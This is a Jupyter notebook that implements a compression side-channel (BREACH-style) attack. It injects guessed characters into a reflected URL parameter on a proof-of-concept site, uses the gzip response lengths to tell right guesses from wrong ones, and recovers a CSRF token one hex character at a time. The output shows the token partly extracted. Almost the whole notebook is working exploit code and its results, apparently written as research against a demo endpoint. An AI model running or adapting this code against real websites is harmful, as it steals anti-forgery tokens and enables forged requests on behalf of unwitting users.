In [1]:
import requests
import os
import random
#print(f'The process ID (for Fiddler filtering) is {os.getpid()}')

In [2]:
# To disable warnigns in IPython:
import warnings
warnings.simplefilter('ignore')

In [100]:
PROXY_SETTINGS = {  # So that it goes through Fiddler
    "http": "http://127.0.0.1:8888",
    "https": "https://127.0.0.1:8888"
}

res = requests.get("https://malbot.net/poc/?request_token='abcd", proxies=PROXY_SETTINGS, verify=False)

In [2]:
res = requests.get("https://malbot.net/poc/?request_token='abcd")
res.headers

{'Cache-Control': 'private', 'Content-Type': 'text/html; charset=utf-8', 'Content-Encoding': 'gzip', 'Vary': 'Accept-Encoding', 'Server': 'Microsoft-IIS/10.0', 'X-AspNet-Version': '4.0.30319', 'X-Powered-By': 'ASP.NET', 'Date': 'Tue, 13 Nov 2018 22:04:49 GMT', 'Content-Length': '2558'}

In [4]:
res_stream = requests.get("https://malbot.net/poc/?request_token='abcd", stream=True)
raw_bytes = res_stream.raw.read()
len(raw_bytes)
#raw_bytes

2558

In [10]:
res_stream.headers

{'Cache-Control': 'private', 'Content-Type': 'text/html; charset=utf-8', 'Content-Encoding': 'gzip', 'Vary': 'Accept-Encoding', 'Server': 'Microsoft-IIS/10.0', 'X-AspNet-Version': '4.0.30319', 'X-Powered-By': 'ASP.NET', 'Date': 'Tue, 13 Nov 2018 16:20:08 GMT', 'Content-Length': '2558'}

In [3]:
BASE_URL = "https://malbot.net/poc/?request_token='"
SECRET_LENGTH = 32
# DICTIONARY = list(map(str, range(10))) + ['a', 'b', 'c', 'd', 'e', 'f']
DICTIONARY = list(map(lambda x: hex(x)[2], range(16))) # All possible 1 hex char combinations

PROXY_SETTINGS = {  # So that it goes through Fiddler
    "http": "http://127.0.0.1:8888",
    "https": "https://127.0.0.1:8888"
}

def pad_character(char, pad_len):
    """
    Surrounds the char with some padding to defeat Huffman Coding induced problems
    """
    # TODO(Alvaro): implement this better
    random_padding = '@' * pad_len
    
    rest_dictionary = '_'.join(filter(lambda x: x != char, DICTIONARY))
    
    return char + random_padding + "---" + rest_dictionary + '@@@@'
    

def get_request_length(url):
    # TODO(Alvaro): Review how this might be implemented from the perspective of an eavesdropper
    res_stream = requests.get(url, stream=True, proxies=PROXY_SETTINGS, verify=False)
    raw_bytes = res_stream.raw.read()
    return len(raw_bytes)

   
def calibrate(curr, pad_len, char1=DICTIONARY[0], char2=DICTIONARY[1]):
    """
    To calibrate (establish the baseline for the current value of the guess), we need to send the first
    2 guesses and compare them, there are 2 possible situations:
      - If the length of both guesses is the same, that means that they are both wrong, or both are candidates, but we
      have a baseline value for the wrong guess' lenght
      - If the length is different, that means that we already have a possible candidate, and a baseline length
    """
    url_1 = BASE_URL + curr + pad_character(char1, pad_len)
    len_1 = get_request_length(url_1)
    url_2 = BASE_URL + curr + pad_character(char2, pad_len)
    len_2 = get_request_length(url_2)
    
    if len_1 == len_2:
        # Both are wrong, or possible candidates, so we use it as baseline
        return [char1, char2], len_1
    elif len_1 < len_2:
        # guess1 is the correct one, we set it as new baseline
        # print(f'len_1={len_1}, len_2={len_2}')
        return [char1], len_1
    else:
        # guess2 is the correct one, we set it as new baseline
        # print(f'len_1={len_1}, len_2={len_2}')
        return [char2], len_2

def solve_conflict(curr, conflicted):
    # Try different pad_lengths   
    for iter_count in range(10): # Loop to avoid infinite loops in case of error
        next_len = random.randint(10, 100)
        candidates, baseline = calibrate(curr, next_len, char1=conflicted[0], char2=conflicted[1])
        print(f'Solving conflict for curr = {curr} ; conflicted = {conflicted} ; trying with pad_len = {next_len}')
        
        for char in conflicted[2:]:
            next_url = BASE_URL + curr + pad_character(char, next_len)
            res_length = get_request_length(next_url)
            
            # Logic to decide whether this char is the best or not 
            if res_length < baseline: 
                # Baseline was wrong, reset results
                candidates = [char]
                baseline = res_length
            elif res_length == baseline:
                # This is a possible candidate
                candidates.append(char)
                
        if len(candidates) == 1:
            # Conflict solved!
            next_guess = curr + candidates[0]
            print(f'Guessed next character! (char = {candidates[0]}), new full guess is: {next_guess}')
            return next_guess
        elif len(candidates) > 1:
            # The conflic was not resolved in this iteration... try again
            conflicted = candidates
        else:
            # This should never happen...
            print(f'ERROR! solving the conflict, the candidates\'s length was negative...')
            
    print(f'ERROR! The conflict could not be resolved, left candidates = {candidates}')
    return
    
def guess_next_char(curr, pad_len=40):
    """
    Tries every possible request combinating the current guess with a char from the
    dictionary, making a request and comparing the length of the body with a previous baseline.
    
    Initially the baseline length is unknown, so at least 2 tries are necessary to establish a baseline. 
    """
    candidates, baseline = calibrate(curr, pad_len)
    
    for char in DICTIONARY[2:]:
        next_url = BASE_URL + curr + pad_character(char, pad_len)
        res_length = get_request_length(next_url)
        
        # Logic to decide whether this char is the best or not 
        if res_length < baseline: 
            # Baseline was wrong, reset results
            candidates = [char]
            baseline = res_length
        elif res_length == baseline:
            # This is a possible candidate
            candidates.append(char)
    
    # Finished
    if len(candidates) == 1:
        # We have a winner!
        next_guess = curr + candidates[0]
        print(f'Guessed next character! (char = {candidates[0]}), new full guess is: {next_guess}')
        return next_guess
    elif len(candidates) > 1:
        # We have conflicts... solve them!:
        return solve_conflict(curr, candidates)
    else: # Should not happen...
        print(f'ERROR! For the current result: {curr}, the was no candidates found!')
        return

def calibrate_old(curr):
    """
    To calbrate (establish the baseline for the current value of the guess), we need to send the first
    2 guesses and compare them, there are 2 possible situations:
      - If the length of both guesses is the same, that means that they are both wrong, but we
      hava a baseline value for the wrong guess' lenght
      - If the length is different, that means that we already have a winner
    """
    url_1 = BASE_URL + curr + pad_character(DICTIONARY[0])
    len_1 = get_request_length(url_1)
    url_2 = BASE_URL + curr + pad_character(DICTIONARY[1])
    len_2 = get_request_length(url_2)
    
    if len_1 == len_2:
        # Both are wrong, and we have a baseline
        return "baseline", len_1
    elif len_1 < len_2:
        # guess1 is the correct one!
        print(f'len_1={len_1}, len_2={len_2}')
        return "done", DICTIONARY[0]
    else:
        # guess2 is the correct one!
        print(f'len_1={len_1}, len_2={len_2}')
        return "done", DICTIONARY[1]


def guess_next_char_old(curr):
    """
    Tries every possible request combinating the current guess with a char from the
    dictionary, making a request and comparing the length of the body with a previous baseline.
    
    Initially the baseline length is unknown, so at least 2 tries are necessary to establish a baseline. 
    """
    res_type, res = calibrate(curr)
    if res_type == "done":
        next_guess = curr + res
        print(f'Guessed next character in calibration phase! (char = {res}), new full guess is: {next_guess}')
        return next_guess
    else: # res_type is "baseline"
        # We did not guess correctly during calibration, but a wrong guess baseline was established
        baseline = res
    
    for char in DICTIONARY[2:]:
        
        next_url = BASE_URL + curr + pad_character(char)
        res_length = get_request_length(next_url)
        
        # Logic to decide whether this char is the best or not 
        if res_length < baseline: 
            # SUCCESS! THIS IS THE CHARACTER
            next_guess = curr + char
            print(f'Guessed next character! (char = {char}), new full guess is: {next_guess}')
            return next_guess

In [7]:
# 2 Tries implementation to compare
def pad_character_2_tries(char, first=True):
    random_padding = "@" * 10
        
    return char + random_padding if first else random_padding + char 
    
def guess_next_char_2_tries(curr):
    """
    Tries every possible request combinating the current guess with a char from the
    dictionary, making a request and comparing the length of the body with a previous baseline.
    
    Initially the baseline length is unknown, so at least 2 tries are necessary to establish a baseline. 
    """
    for char in DICTIONARY:
        # 2 Tries
        url_1 = BASE_URL + curr + pad_character_2_tries(char)
        len_1 = get_request_length(url_1)
        url_2 = BASE_URL + curr + pad_character_2_tries(char, first=False)
        len_2 = get_request_length(url_2)
        
        # Logic to decide whether this char is the best guess or not 
        if len_1 < len_2:
            # SUCCESS! THIS IS THE CHARACTER
            next_guess = curr + char
            print(f'Guessed next character! (char = {char}), new full guess is: {next_guess}')
            return next_guess
        elif len_1 > len_2:
            # Should not happen?
            print(f'Ugh! len_1 < len_2! ({len_1} < {len_2})')
            return
        else:
            # This isn't it, try the next one
            continue

In [8]:
guess_next_char_2_tries("bb")

Guessed next character! (char = 1), new full guess is: bb1


'bb1'

In [27]:
# MAIN
current_guess = ""
# Watch end condition... for now we presume we know the expected length of the secret
for _ in range(SECRET_LENGTH):
    next_guess = guess_next_char(current_guess)
    if next_guess is None:
        # Something went wrong and could not guess next char
        print(f'Whoops... no guess was found with the current_guess = {current_guess}')
        break
    else:
        current_guess = next_guess

print(f'The CSRF token is: ' + current_guess)

Guessed next character! (char = b), new full guess is: b
Guessed next character! (char = b), new full guess is: bb
Guessed next character! (char = 6), new full guess is: bb6
Guessed next character! (char = 3), new full guess is: bb63
Guessed next character! (char = e), new full guess is: bb63e
Guessed next character! (char = 4), new full guess is: bb63e4
Guessed next character! (char = b), new full guess is: bb63e4b
Solving conflict for curr = bb63e4b ; conflicted = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'] ; trying with pad_len = 53
Guessed next character! (char = a), new full guess is: bb63e4ba
Guessed next character! (char = 6), new full guess is: bb63e4ba6
Guessed next character! (char = 7), new full guess is: bb63e4ba67
Solving conflict for curr = bb63e4ba67 ; conflicted = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'] ; trying with pad_len = 19
Solving conflict for curr = bb63e4ba67 ; conflicted = ['0', '1',

This is **Almost** right, but at some point it gets confused and starts guessing fs and 0s...
See if there is a problem with calibration... maybe choose the BEST winner? do something with a group of potential winners?

In [6]:
# Debug
guess_next_char("bb63e4ba67")
'-'.join(filter(lambda x: x != '1', DICTIONARY))

Guessed next character! (char = e), new full guess is: bb63e4ba67e


'0-2-3-4-5-6-7-8-9-a-b-c-d-e-f'

In [26]:
guess_next_char("bb63e4ba67e24")

Guessed next character! (char = d), new full guess is: bb63e4ba67e24d


'bb63e4ba67e24d'

In [15]:

# requests.get('https://malbot.net/poc/request_token=a{}{}{}{}{}bla', proxies=PROXY_SETTINGS, verify=False, config={'encode_uri':False})